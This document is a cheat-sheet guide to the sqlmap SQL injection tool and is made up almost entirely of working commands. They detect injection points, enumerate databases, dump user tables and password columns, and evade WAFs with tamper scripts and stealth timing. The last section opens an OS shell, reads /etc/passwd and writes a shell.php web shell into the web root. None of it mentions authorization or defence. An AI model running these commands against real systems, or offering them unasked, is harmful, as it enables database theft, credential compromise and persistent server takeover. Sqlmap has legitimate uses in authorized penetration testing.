sqlmap Guide
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev cd sqlmap-dev python sqlmap.py # Or: pip install sqlmap # Or Docker: docker pull sqlmapproject/sqlmap
sqlmap automatically detects and exploits SQL injection vulnerabilities. It fingerprints the database (MySQL, PostgreSQL, Oracle, MSSQL, SQLite), enumerates tables/columns, dumps data, and can even gain OS shell access via `xp_cmdshell` or `INTO OUTFILE`.
Start with a request file from Burp/ZAP: `-r request.txt`. Or pass the URL with `-u`, cookie with `--cookie`, and POST body with `--data`. Use `--batch` for non-interactive mode and `--level` (1-5) / `--risk` (1-3) to control aggressiveness.
sqlmap supports time-based blind, error-based, boolean blind, and UNION injection techniques. Use `--technique` to limit to specific types (e.g., `--technique=TIME` for slow but stealthy). WAF bypass options include `--tamper=space2comment` and `--random-agent`.
Detection
sqlmap -u "https://example.com/page?id=1" --batch sqlmap -u "https://example.com/page?id=1" --cookie="session=abc123" sqlmap -u "https://example.com/login" --data="user=admin&pass=test" --batch
# Capture request from Burp/ZAP → save as request.txt sqlmap -r request.txt --batch # Or combine with specific parameter: sqlmap -r request.txt -p "id,category" --batch
Enumeration
sqlmap -u "https://example.com/page?id=1" --banner --batch sqlmap -u "https://example.com/page?id=1" --hostname --batch sqlmap -u "https://example.com/page?id=1" --current-user --current-db --batch sqlmap -u "https://example.com/page?id=1" --is-dba --batch # Check if DB admin
sqlmap -u "https://example.com/page?id=1" --tables --batch sqlmap -u "https://example.com/page?id=1" -D database_name --tables --batch sqlmap -u "https://example.com/page?id=1" --columns -T users --batch sqlmap -u "https://example.com/page?id=1" --schema --batch # Full DB schema
Data Extraction
sqlmap -u "https://example.com/page?id=1" --dump -T users --batch sqlmap -u "https://example.com/page?id=1" --dump-all --batch # All tables sqlmap -u "https://example.com/page?id=1" --dump -T users \ --stop 10 --start 1 # First 10 rows only sqlmap -u "https://example.com/page?id=1" --dump -C "username,password" -T users
Evasion
sqlmap -u "https://example.com/page?id=1" --tamper=space2comment --batch sqlmap -u "https://example.com/page?id=1" --tamper=between --random-agent sqlmap -u "https://example.com/page?id=1" --tamper=charencode --batch # List all tampers: ls /usr/share/sqlmap/tamper/ # Chain tampers: sqlmap -u "..." --tamper="between,randomcase,space2comment"
# Faster (noisier): sqlmap -u "..." --threads=10 --technique=ERROR --batch # Stealthy (slower): sqlmap -u "..." --technique=TIME --time-sec=2 --delay=1 --batch # --technique options: B: Boolean, E: Error, U: Union, S: Stacked, T: Time, Q: Inline
Advanced
sqlmap -u "https://example.com/page?id=1" --os-shell --batch # Only works if: DBA privileges + MySQL/MSSQL # Gives interactive OS shell # File read/write: sqlmap -u "https://example.com/page?id=1" --file-read=/etc/passwd sqlmap -u "https://example.com/page?id=1" --file-write=shell.php --file-dest=/var/www/html/shell.php